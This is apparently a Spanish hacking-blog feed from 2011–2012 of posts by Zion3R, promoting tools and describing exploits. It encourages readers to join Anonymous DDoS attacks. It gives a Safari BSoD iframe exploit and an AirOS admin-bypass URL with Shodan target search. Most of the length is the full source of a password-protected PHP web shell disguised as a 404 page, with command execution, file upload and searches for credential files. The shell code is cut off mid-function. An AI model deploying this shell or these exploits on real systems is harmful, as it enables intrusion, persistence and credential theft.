Blackploit [PenTest]

Curso Completo Software Libre

noreply@blogger.com (Zion3R) — Sat, 28 Jan 2012 17:23:58 PST

En Tuxapuntes han publicado un conjunto de manuales sobre Software Libre muy completos que nos dará una amplia noción sobre GNU/Linux, Bases de datos, redes, etc...

El Curso se divide en partes (12) las cuales son bastante extensas, pero muy detalladas y claras. Sin duda vale la pena darse un tiempo para leerlos, o si no simplemente leer el tema que más nos interese.

Aquí el Index con los 12 temas (15 PDFs), hacer clic para descargar cada cual:

1. Introducción al software libre.

2. Sistema operativo gnu/linux básico.

3. Administración avanzada de GNU/Linux.

4. Desarrollo de aplicaciones web.

5. Utilidades y herramientas.

6. a. Aspectos legales y de explotación del software libre Parte I.

6. b. Aspectos legales y de explotación del software libre parte II.

7. Bases de Datos.

8. Implantación de sistemas en gnu/linux.

9. Ingeniería del software en entornos de SL.

10. Introduccion al desarrollo de software.

11. Redes computacionales.

12-1. Aspectos avanzados de seguridad en redes.

12-2. Apéndice: GNU Free Documentation License.

12-3. Apéndice: Aspectos avanzados en seguridad en redes.

Si desean más información pueden ir al index oficial: http://www.tuxapuntes.com/node/177

Si prefieren pueden descargar todos el curso Completo (los 15 PDFs) directamente desde aquí:

Download Curso Completo Software Libre

[+] Salu2
[+] Zion3R

Megaupload DOWN!

noreply@blogger.com (Zion3R) — Fri, 20 Jan 2012 12:00:07 PST

Como ya se habrán dado cuenta el FBI cerró MEGAUPLOAD, un paso más a la hostilidad y a la censura de un Internet libre... Mucho se puede decir, y poco se puede hacer, ataques DDoS no son suficientes si creen que con eso se logra algo...

Muchos archivos de Blackploit.com estaban hospeados en Megaupload, intentaré arreglarlos en breve, pero no será extraño que empiecen a votar otros servicios de descargas...

Si deciden ayudar a Anonymous en los ataques DDoS por favor usen buenas proxys o VPNs como corresponde.

3l Conocimiento Debe Ser Libr3!

[+] Salu2
[+] Zion3R

[ShellDetect v1.0] Herramienta para detección de Shell Codes

noreply@blogger.com (Zion3R) — Sun, 15 Jan 2012 18:18:23 PST

Shell Detect es una herramienta desarrollada por Amit Malik para detectar la presencia de Shell Codes dentro de un archivo o de un tráfico de red. Con ella se pueden analizar binarios (como los generados por Metasploit por ejemplo) o archivos en un flujo de red (capturando el tráfico con tcpdump/wireshark).

Hoy en día los atacantes distribuyen archivos maliciosos que contienen Shell Codes ocultos. Al abrir estos archivos, el Shell Code se ejecutan en silencio, lo que compromete la integridad del sistema. Esto es más peligroso cuando la explotación es "Zero Day", ya que no será detectado por la firma tradicional del anti-virus. En estos casos ShellDetect ayuda a identificar la presencia de Shell Codes y ayudará en la tarea de mantener el sistema seguro.

Para correr ShellDetect es necesario instalar Python, además se recomienda correrla en una máquina virtual (Vmware/VirtualBox) ya que la herramienta todavía está muy beta y aun se le escapan Shell Codes más avanzadas, pero lo importante es que detecta las de Metasploit que son las más usadas.

El uso de la herramienta es muy fácil (y por ahora simplemente corre bajo Windows XP), simplemente se usa en la consola: ShellDetect.py file_name y analiza el archivo o el tráfico de red capturado.

Analizando primero un archivo (pgeneric-12.txt), después un tráfico de red capturado (network_stream).

Como dije arriba, la herramienta está en beta, pero la encuentro muy útil y le veo bastante futuro.

Más información: http://securityxploded.com/shell-detect.php

Descarga ShellDetect v1.0

[+] Salu2
[+] Zion3R

[Vídeo] Explicación de la ley SOPA y porqué hay que DETENERLA!

noreply@blogger.com (Zion3R) — Sun, 08 Jan 2012 16:12:12 PST

Simplemente un vídeo imperdible donde explican (~~for dummies~~) la implicancias desastrosas de la ley SOPA en la libertad no sólo de internet, si no también de cada individuo y las ventajas para la empresas de la mafia de contenido. Dejo el vídeo:

NO a la ley SOPA!
3l Conocimiento Debe Ser Libr3!

Via: http://blog.segu-info.com.ar/

[+] Salu2
[+] Zion3R

[Patator] Herramienta Multi-Propósito para Fuerza Bruta

noreply@blogger.com (Zion3R) — Wed, 04 Jan 2012 17:42:08 PST

Patator es una herramienta (script en python) multi-propósito para fuerza bruta, esta herramienta nace del aburrimiento del creador usando otras herramientas para fuerza bruta conocidas como Medusa, Hydra, ncrack, módulos auxiliares de metasploit, scripts de nmap NSE y similares porque:

O bien no funcionan o no son fiables (falsos negativos en varias ocasiones).
Son lentos (no multi-threaded o no prueban múltiples contraseñas en la misma conexión TCP).
Carecen de características útiles que ofrece Python (por ejemplo, interactivo en tiempo de ejecución).

Por lo cual Patator es una buena opción si se decepcionan de Medusa, Hydra, ncrack, etc... y otras herramientas de FB, ya que nos ofrece:

No escribir el mismo código una y otra vez.
Ejecutar múltiples subprocesos.
Beneficiarse de las características útiles, tales como los comandos de tiempo de ejecución interactiva, el registro de respuesta, etc...

Actualmente soporta los siguientes módulos:

 * ftp_login     : Brute-force FTP
 * ssh_login     : Brute-force SSH
 * telnet_login  : Brute-force Telnet
 * smtp_login    : Brute-force SMTP
 * smtp_vrfy     : Enumerate valid users using the SMTP VRFY command
 * smtp_rcpt     : Enumerate valid users using the SMTP RCPT TO command
 * http_fuzz     : Brute-force HTTP/HTTPS
 * pop_passd     : Brute-force poppassd (not POP3)
 * ldap_login    : Brute-force LDAP
 * smb_login     : Brute-force SMB
 * mssql_login   : Brute-force MSSQL
 * oracle_login  : Brute-force Oracle
 * mysql_login   : Brute-force MySQL
 * pgsql_login   : Brute-force PostgreSQL
 * vnc_login     : Brute-force VNC
 * dns_forward   : Forward lookup subdomains
 * dns_reverse   : Reverse lookup subnets
 * snmp_login    : Brute-force SNMPv1/2 and SNMPv3
 * unzip_pass    : Brute-force the password of encrypted ZIP files
 * keystore_pass : Brute-force the password of Java keystore files

Ojo! que está herramienta no es recomendada para personas que se aburrieron de Medusa, Hydra... por no saber como usarlas, es sólo por si no les dieron el resultado esperado. El autor deja una nota de esta herramienta diciendo que NO es amigable para script-kiddie, ya que su funcionamiento requiere de muchas más variables que otras tools por eso también es más efectiva.

En la web del autor dejan muy claro como usarla, no voy a incluir aquí como usarlo ya que estoy informando de la herramienta y no estoy haciendo su manual de uso.

Web del proyecto: http://code.google.com/p/patator/

DESCARGA Pataror V0.3

[+] Salu2

[+] Zion3R

Feliz Año Nuevo (FIN del Mundo) 2012!

noreply@blogger.com (Zion3R) — Sat, 31 Dec 2011 19:44:42 PST

Se viene el anunciado 2012; muerte, hambre, destrucción, cambios climáticos, desastres nucleares, cataclismos se han presagiado... En verdad eso ya pasó en este pasado 2011 y poniéndose un poco más realista, se viene un año decisivo para el hacktivismo, aun así no creo que el mundo se acabe.

El pasado 2011 se abrió el paso al hacktimismo mundial en son de la conciencia social y nacieron grupos que resguardados bajo el anonimato de la red han sacado su voz de entre las tinieblas y con el firme pensamiento de que se puede hacer o evitar cambios en la sociedad sin necesidad de ser un pez gordo, han logrado unificar fuerzas en la red para desenmascarar problemáticas de diferentes índoles, de pasada dejando en evidencia precarios y vulnerables sistemas de seguridad de reconocidas empresas y corporaciones.

Es así como este 2011 nos ha dejado muchas confidencias de lo que se teje entre los gobiernos (muchos trucos sucios) gracias a los hacks memorables de grupos hacktivistas (no solamente Anonymous) y a los cables de WikiLeaks.

Así que este 2012 se nos viene jugoso y noticioso, y quien sabe que vaya a pasar, es todo incierto...

En fin, espero que tengan un FELIZ AÑO NUEVO 2012 y espero también poder seguir acompañándolos este 2012 para escribirles más posts y todo lo que acontezca.

[+] Salu2

[+] Zion3R 2012

BSOD (Blue Screen Of Death) En Win7 Via Safari

noreply@blogger.com (Zion3R) — Sat, 31 Dec 2011 08:03:11 PST

Para los que no se enteraron, salió a luz una simple vulneravilidad (Safari Iframe Vulnerability 20.12.2011) que provoca un BSOD (Pantallazo Azul (de la muerte)) al abrir un archivo *.html con un iframe que excede el tamaño soportado por Safari.

Datos del Exploit :

# Exploit Title: GdiDrawStream BSoD

# Date: 18-12-2011

# Author: webDEViL

# Version: Latest

# Tested on: Windows 7 x64 using Safari

# http://twitter.com/w3bd3vil

La vulnerabilidad se explota simplemente poniendo en un archivo *.html el siguiente código:

<iframe height='18082563'></iframe>

Después simplemente al abrir el *.html con Safari se general el BSOD.

Eso nada más...

[+] Salu2
[+] Zion3R

0day en AirOS (Acceso como Root)

noreply@blogger.com (Zion3R) — Fri, 30 Dec 2011 19:41:19 PST

Bueno, me ha llegado un mail bastante interesante sobre un 0day en Arios, y no sé de que tanto tiempo estemos hablando, pero revisando un poco me he dado cuenta que sigue muy vigente...

Y esto decia el mail:

AirOS remote root 0day

since some genius decided to write worm for this, here is early santa for you, kids:

1. http://www.shodanhq.com/search?q=airos
2. click arbitrary system
3. change http://X.X.X.X/login.cgi?uri=/ to http://X.X.X.X/admin.cgi/sd.css
4. profit?

IRCNet opers: expect some decent KNB bot mayhem for a while :)

Lo que dice es que es una manera de obtener acceso al panel de administrador de AirOS sin autentificarse, es una suerte de bypass, y es bastante simple, también dice que algún genio inventó un gusano que se aprovecha de esto, así que nos lo deja de regalo de navidad...

Si no entendieron mucho, entro a explicar.

AirOS creado por Ubiquiti se basa en un sistema operativo avanzado capaz de manejar un poderoso sistema inalámbrico y funciones de enrutamiento, desarrollado con una interfaz de usuario simple, limpia e intuitiva (a diferencia con otros sistemas).

Bueno, la vulnerabilidad que ya fue parchada en la última versión, pero que sigue siendo muy explotable, simplemente en determinado servidor que tenga AirOS hay que cambiar los valores de la url y ya está, se tiene acceso al panel de admin sin necesidad de contraseña:

Url de logeo sin modificar:

http://X.X.X.X/login.cgi?uri=/

Acceso al panel de admin sin autentificación:

http://X.X.X.X/admin.cgi/sd.css

Una vez bypasseado pueden subir archivos (como una shell), pueden ejecutar comandos, lo que se les ocurra...

Para encontrar servidores con AirOS simplemente usar el todopoderoso SHODAN:
http://www.shodanhq.com/search?q=airos

[+] Salu2
[+] Zion3R

Feliz Navidad les desea Blackploit!

noreply@blogger.com (Zion3R) — Sat, 24 Dec 2011 10:41:54 PST

Feliz navidad a todos les desea Blackploit!, con el compromiso de poder seguir aportando en el futuro...

[+] Salu2

[+] Zion3R

[MySQL Password Auditor] Auditoría & Recuperación de Contraseñas MySQL

noreply@blogger.com (Zion3R) — Sat, 31 Dec 2011 07:37:16 PST

Desde SecurityXploded les traigo MysqlPasswordAuditor que es un programa gratuito de recuperación de contraseña de MySQL (uno de los software de bases de datos más potentes y utilizadas por la mayoría de las aplicaciones y servidores web).

MysqlPasswordAuditor ayuda a la recuperación de la contraseña de un servidor MySQL y puede ser usada para auditar bases de datos Mysql y descubrir contraseñas débiles.

MysqlPasswordAuditor es muy fácil de usar, con la simple diccionario, por fuerza bruta empieza a probar todas las contraseñas que estén en nuestro diccionario. Por defecto se incluye una lista de contraseñas de archivos pequeños, sin embargo pueden encontrar más diccionario con contraseñas aquí.

MysqlPasswordAuditor trabaja solo en Windows, funciona desde el XP hasta Windows 7.

La instalación es bastante simple next -> next... finish.

Aquí un Screen:

Descarga MysqlPasswordAuditor 1.0

Plataformas: Windows XP, 2003, Vista, Win7

Web oficial: http://securityxploded.com/

[+] Salu2

[+] Zion3R

[The Mole] Herramienta de Inyección SQL/SQLi Automatizada

noreply@blogger.com (Zion3R) — Thu, 15 Dec 2011 15:02:49 PST

Como regalo de navidad les traigo una de tantas herramientas para SQLi que existen, pero está me ha gustado bastante primero por que es de muy fácil uso y también por los métodos de petición que tiene.

The Mole es una herramienta de inyección SQL automatizada que mediante una URL vulnerable con su(s) respectivo(s) string(s) detectada y testeada en busca de vulnerabilidad SQLi, ya sea por método UNION o por consulta Booleana.

Características:

Soporta inyecciones a MySQL, SQL Server, PostgreSQL & Oracle.
Soporta linea de comandos. Diferente comando producen diferentes respuestas.
Auto-completación de los comandos, argumentos de comandos y los nombres de base de datos, tabla y las columnas.
Soporte pata filtros de consulta, para bypass IPS/IDS.
Explota inyecciones SQL a través de métodos GET y POST.
Desarrollada en python3.

Vídeo demostrativo:

Web del proyecto: http://themole.sourceforge.net/

Descarga The Mole (2011-11-25):
Windows 32bit executable: themole-0.2.6-win32.zip
Tarball-gzipped format: themole-0.2.6-lin-src.tar.gz
Zip format: http://themole-0.2.6-win-src.zip

Tutorial Modo de uso de "The Mole"

[+] Salu2
[+] Zion3R

[Shell PHP] Error 404 Privada

noreply@blogger.com (Zion3R) — Mon, 12 Dec 2011 19:31:08 PST

Los chicos de www.subhashdasyam.com han hecho una Shell en PHP que la he encontrado bastante ingeniosa, útil y me ha gustado mucho. No necesita una ser detallada muy a fondo, ya que es como una Shell normal, solo que cuando uno intenta acceder aparece el clásico Error 404 - Not Found, pero tiene un casilla secreta donde puedes poner una contraseña para acceder.

La contraseña por defecto es HACKED pero la pueden cambiar modificando la linea 4 en donde tienen que cambiar el hash MD5 que aparece por el hash MD5 de la contraseña que ustedes consideren.

$auth_pass = "36028fcd4abb97e9e4f47d929ddc9980";

Les dejo el código como un regalo de navidad ;)

<?php 
/* WSO 2.1 (Web Shell by pgems.in) */ 
/*Subhashdasyam.com*/
$auth_pass = "36028fcd4abb97e9e4f47d929ddc9980"; 
$color = "#00ff00"; 
$default_action = 'FilesMan'; 
@define('SELF_PATH', __FILE__); 
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) { 
    header('HTTP/1.0 404 Not Found'); 
    exit; 
} 
@session_start(); 
@error_reporting(0); 
@ini_set('error_log',NULL); 
@ini_set('log_errors',0); 
@ini_set('max_execution_time',0); 
@set_time_limit(0); 
@set_magic_quotes_runtime(0); 
@define('VERSION', '2.1'); 
if( get_magic_quotes_gpc() ) { 
    function stripslashes_array($array) { 
        return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); 
    } 
    $_POST = stripslashes_array($_POST); 
} 
function printLogin() { 
    ?> 
<h1>Not Found</h1> 
<p>The requested URL was not found on this server.</p> 
<hr> 
<address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address> 
    <style> 
        input { margin:0;background-color:#fff;border:1px solid #fff; } 
    </style> 
    <center> 
    <form method=post> 
    <input type=password name=pass> 
    </form></center> 
    <?php 
    exit; 
} 
if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] )) 
    if( empty( $auth_pass ) || 
        ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) ) 
        $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; 
    else 
        printLogin(); 

if( strtolower( substr(PHP_OS,0,3) ) == "win" ) 
    $os = 'win'; 
else 
    $os = 'nix'; 
$safe_mode = @ini_get('safe_mode'); 
$disable_functions = @ini_get('disable_functions'); 
$home_cwd = @getcwd(); 
if( isset( $_POST['c'] ) ) 
    @chdir($_POST['c']); 
$cwd = @getcwd(); 
if( $os == 'win') { 
    $home_cwd = str_replace("\\", "/", $home_cwd); 
    $cwd = str_replace("\\", "/", $cwd); 
} 
if( $cwd[strlen($cwd)-1] != '/' ) 
    $cwd .= '/'; 
     
if($os == 'win') 
    $aliases = array( 
        "List Directory" => "dir", 
        "Find index.php in current dir" => "dir /s /w /b index.php", 
        "Find *config*.php in current dir" => "dir /s /w /b *config*.php", 
        "Show active connections" => "netstat -an", 
        "Show running services" => "net start", 
        "User accounts" => "net user", 
        "Show computers" => "net view", 
        "ARP Table" => "arp -a", 
        "IP Configuration" => "ipconfig /all" 
    ); 
else 
    $aliases = array( 
          "List dir" => "ls -la", 
        "list file attributes on a Linux second extended file system" => "lsattr -va", 
          "show opened ports" => "netstat -an | grep -i listen", 
        "Find" => "", 
          "find all suid files" => "find / -type f -perm -04000 -ls", 
          "find suid files in current dir" => "find . -type f -perm -04000 -ls",
          "find all sgid files" => "find / -type f -perm -02000 -ls", 
          "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
          "find config.inc.php files" => "find / -type f -name config.inc.php", 
          "find config* files" => "find / -type f -name \"config*\"", 
          "find config* files in current dir" => "find . -type f -name \"config*\"", 
          "find all writable folders and files" => "find / -perm -2 -ls", 
          "find all writable folders and files in current dir" => "find . -perm -2 -ls", 
          "find all service.pwd files" => "find / -type f -name service.pwd", 
          "find service.pwd files in current dir" => "find . -type f -name service.pwd", 
          "find all .htpasswd files" => "find / -type f -name .htpasswd", 
          "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", 
          "find all .bash_history files" => "find / -type f -name .bash_history", 
          "find .bash_history files in current dir" => "find . -type f -name .bash_history", 
          "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", 
          "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", 
        "Locate" => "", 
          "locate httpd.conf files" => "locate httpd.conf", 
        "locate vhosts.conf files" => "locate vhosts.conf", 
        "locate proftpd.conf files" => "locate proftpd.conf", 
        "locate psybnc.conf files" => "locate psybnc.conf", 
        "locate my.conf files" => "locate my.conf", 
        "locate admin.php files" =>"locate admin.php", 
        "locate cfg.php files" => "locate cfg.php", 
        "locate conf.php files" => "locate conf.php", 
        "locate config.dat files" => "locate config.dat", 
        "locate config.php files" => "locate config.php", 
        "locate config.inc files" => "locate config.inc", 
        "locate config.inc.php" => "locate config.inc.php", 
        "locate config.default.php files" => "locate config.default.php", 
        "locate config* files " => "locate config", 
        "locate .conf files"=>"locate '.conf'", 
        "locate .pwd files" => "locate '.pwd'", 
        "locate .sql files" => "locate '.sql'", 
        "locate .htpasswd files" => "locate '.htpasswd'", 
        "locate .bash_history files" => "locate '.bash_history'", 
        "locate .mysql_history files" => "locate '.mysql_history'", 
        "locate .fetchmailrc files" => "locate '.fetchmailrc'", 
        "locate backup files" => "locate backup", 
        "locate dump files" => "locate dump", 
        "locate priv files" => "locate priv"     
    ); 

function printHeader() { 
    if(empty($_POST['charset'])) 
        $_POST['charset'] = "UTF-8"; 
    global $color; 
    ?> 
<html><head><meta http-equiv='Content-Type' content='text/html; charset=<?=$_POST['charset']?>'><title><?=$_SERVER['HTTP_HOST']?>- 404 Not Found Shell V.<?=VERSION?>-SubhashDasyam.com</title> 
<style> 
    body {background-color:#000;color:#fff;} 
    body,td,th    { font: 9pt Lucida,Verdana;margin:0;vertical-align:top; } 
    span,h1,a    { color:<?=$color?> !important; } 
    span        { font-weight: bolder; } 
    h1            { border:1px solid <?=$color?>;padding: 2px 5px;font: 14pt Verdana;margin:0px; } 
    div.content    { padding: 5px;margin-left:5px;} 
    a            { text-decoration:none; } 
    a:hover        { background:#ff0000; } 
    .ml1        { border:1px solid #444;padding:5px;margin:0;overflow: auto; } 
    .bigarea    { width:100%;height:250px; } 
    input, textarea, select    { margin:0;color:#00ff00;background-color:#000;border:1px solid <?=$color?>; font: 9pt Monospace,"Courier New"; } 
    form        { margin:0px; } 
    #toolsTbl    { text-align:center; } 
    .toolsInp    { width: 80%; } 
    .main th    {text-align:left;} 
    .main tr:hover{background-color:#5e5e5e;} 
    .main td, th{vertical-align:middle;} 
    pre            {font-family:Courier,Monospace;} 
    #cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);} 
</style> 
<script> 
    function set(a,c,p1,p2,p3,charset) { 
        if(a != null)document.mf.a.value=a; 
        if(c != null)document.mf.c.value=c; 
        if(p1 != null)document.mf.p1.value=p1; 
        if(p2 != null)document.mf.p2.value=p2; 
        if(p3 != null)document.mf.p3.value=p3; 
        if(charset != null)document.mf.charset.value=charset; 
    } 
    function g(a,c,p1,p2,p3,charset) { 
        set(a,c,p1,p2,p3,charset); 
        document.mf.submit(); 
    } 
    function a(a,c,p1,p2,p3,charset) { 
        set(a,c,p1,p2,p3,charset); 
        var params = "ajax=true"; 
        for(i=0;i<document.mf.elements.length;i++) 
            params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value); 
        sr('<?=$_SERVER['REQUEST_URI'];?>', params); 
    } 
    function sr(url, params) {     
        if (window.XMLHttpRequest) { 
            req = new XMLHttpRequest(); 
            req.onreadystatechange = processReqChange; 
            req.open("POST", url, true); 
            req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded"); 
            req.send(params); 
        }  
        else if (window.ActiveXObject) { 
            req = new ActiveXObject("Microsoft.XMLHTTP"); 
            if (req) { 
                req.onreadystatechange = processReqChange; 
                req.open("POST", url, true); 
                req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded"); 
                req.send(params); 
            } 
        } 
    } 
    function processReqChange() { 
        if( (req.readyState == 4) ) 
            if(req.status == 200) { 
                //alert(req.responseText); 
                var reg = new RegExp("(\\d+)([\\S\\s]*)", "m"); 
                var arr=reg.exec(req.responseText); 
                eval(arr[2].substr(0, arr[1])); 
            }  
            else alert("Request error!"); 
    } 
</script> 
<head><body><div style="position:absolute;width:100%;top:0;left:0;"> 
<form method=post name=mf style='display:none;'> 
<input type=hidden name=a value='<?=isset($_POST['a'])?$_POST['a']:''?>'> 
<input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'> 
<input type=hidden name=p1 value='<?=isset($_POST['p1'])?htmlspecialchars($_POST['p1']):''?>'> 
<input type=hidden name=p2 value='<?=isset($_POST['p2'])?htmlspecialchars($_POST['p2']):''?>'> 
<input type=hidden name=p3 value='<?=isset($_POST['p3'])?htmlspecialchars($_POST['p3']):''?>'> 
<input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'> 
</form> 
<?php 
    $freeSpace = @diskfreespace($GLOBALS['cwd']); 
    $totalSpace = @disk_total_space($GLOBALS['cwd']); 
    $totalSpace = $totalSpace?$totalSpace:1; 
    $release = @php_uname('r'); 
    $kernel = @php_uname('s'); 
    $millink='http://milw0rm.com/search.php?dong='; 
    if( strpos('Linux', $kernel) !== false ) 
        $millink .= urlencode( 'Linux Kernel ' . substr($release,0,6) ); 
    else 
        $millink .= urlencode( $kernel . ' ' . substr($release,0,3) ); 
    if(!function_exists('posix_getegid')) { 
        $user = @get_current_user(); 
        $uid = @getmyuid(); 
        $gid = @getmygid(); 
        $group = "?"; 
    } else { 
        $uid = @posix_getpwuid(@posix_geteuid()); 
        $gid = @posix_getgrgid(@posix_getegid()); 
        $user = $uid['name']; 
        $uid = $uid['uid']; 
        $group = $gid['name']; 
        $gid = $gid['gid']; 
    } 
    $cwd_links = ''; 
    $path = explode("/", $GLOBALS['cwd']); 
    $n=count($path); 
    for($i=0;$i<$n-1;$i++) { 
        $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\""; 
        for($j=0;$j<=$i;$j++) 
            $cwd_links .= $path[$j].'/'; 
        $cwd_links .= "\")'>".$path[$i]."/</a>"; 
    } 
    $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); 
    $opt_charsets = ''; 
    foreach($charsets as $item) 
        $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>'; 
    $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network'); 
    if(!empty($GLOBALS['auth_pass'])) 
    $m['Logout'] = 'Logout'; 
    $m['Self remove'] = 'SelfRemove'; 
    $menu = ''; 
    foreach($m as $k => $v) 
        $menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>'; 
    $drives = ""; 
    if ($GLOBALS['os'] == 'win') { 
        foreach( range('a','z') as $drive ) 
        if (is_dir($drive.':\\')) 
            $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> '; 
    } 
    echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname<br>User<br>Php<br>Hdd<br>Cwd'.($GLOBALS['os'] == 'win'?'<br>Drives':'').'</span></td>'. 
         '<td>:<nobr>'.substr(@php_uname(), 0, 120).'  <a href="http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[Google]</a> <a href="'.$millink.'" target=_blank>[milw0rm]</a></nobr><br>:'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( '.$group.' )<br>:'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=<?=$color?><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>:'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>:'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>:'.$drives.'</td>'. 
         '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.'</optgroup></select><br><span>Server IP:</span><br>'.gethostbyname($_SERVER["HTTP_HOST"]).'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'. 
         '<table cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.'</tr></table><div style="margin:5">'; 
} 

function printFooter() { 
    $is_writable = is_writable($GLOBALS['cwd'])?"<font color=green>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>"; 
?> 
</div> 
<table class=info id=toolsTbl cellpadding=0 cellspacing=0 width=100%"> 
    <tr> 
        <td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="<?=htmlspecialchars($GLOBALS['cwd']);?>"><input type=submit value=">>"></form></td> 
        <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td> 
    </tr> 
    <tr> 
        <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form><?=$is_writable?></td> 
        <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form><?=$is_writable?></td> 
    </tr> 
    <tr> 
        <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td> 
        <td><form method='post' ENCTYPE='multipart/form-data'> 
        <input type=hidden name=a value='FilesMAn'> 
        <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'> 
        <input type=hidden name=p1 value='uploadFile'> 
        <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'> 
        <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form><?=$is_writable?></td> 
    </tr> 

</table> 
</div> 
</body></html> 
<?php 
} 
if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }
if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }
function ex($in) { 
    $out = ''; 
    if(function_exists('exec')) { 
        @exec($in,$out); 
        $out = @join("\n",$out); 
    }elseif(function_exists('passthru')) { 
        ob_start(); 
        @passthru($in); 
        $out = ob_get_clean(); 
    }elseif(function_exists('system')) { 
        ob_start(); 
        @system($in); 
        $out = ob_get_clean(); 
    }elseif(function_exists('shell_exec')) { 
        $out = shell_exec($in); 
    }elseif(is_resource($f = @popen($in,"r"))) { 
        $out = ""; 
        while(!@feof($f)) 
            $out .= fread($f,1024); 
        pclose($f); 
    } 
    return $out; 
} 
function viewSize($s) { 
    if($s >= 1073741824) 
        return sprintf('%1.2f', $s / 1073741824 ). ' GB'; 
    elseif($s >= 1048576) 
        return sprintf('%1.2f', $s / 1048576 ) . ' MB'; 
    elseif($s >= 1024) 
        return sprintf('%1.2f', $s / 1024 ) . ' KB'; 
    else 
        return $s . ' B'; 
} 

function perms($p) { 
    if (($p & 0xC000) == 0xC000)$i = 's'; 
    elseif (($p & 0xA000) == 0xA000)$i = 'l'; 
    elseif (($p & 0x8000) == 0x8000)$i = '-'; 
    elseif (($p & 0x6000) == 0x6000)$i = 'b'; 
    elseif (($p & 0x4000) == 0x4000)$i = 'd'; 
    elseif (($p & 0x2000) == 0x2000)$i = 'c'; 
    elseif (($p & 0x1000) == 0x1000)$i = 'p'; 
    else $i = 'u'; 
    $i .= (($p & 0x0100) ? 'r' : '-'); 
    $i .= (($p & 0x0080) ? 'w' : '-'); 
    $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); 
    $i .= (($p & 0x0020) ? 'r' : '-'); 
    $i .= (($p & 0x0010) ? 'w' : '-'); 
    $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); 
    $i .= (($p & 0x0004) ? 'r' : '-'); 
    $i .= (($p & 0x0002) ? 'w' : '-'); 
    $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); 
    return $i; 
} 
function viewPermsColor($f) {  
    if (!@is_readable($f)) 
        return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>'; 
    elseif (!@is_writable($f)) 
        return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>'; 
    else 
        return '<font color=#00BB00><b>'.perms(@fileperms($f)).'</b></font>'; 
} 
if(!function_exists("scandir")) { 
    function scandir($dir) { 
        $dh  = opendir($dir); 
        while (false !== ($filename = readdir($dh))) { 
            $files[] = $filename; 
        } 
        return $files; 
    } 
} 
function which($p) { 
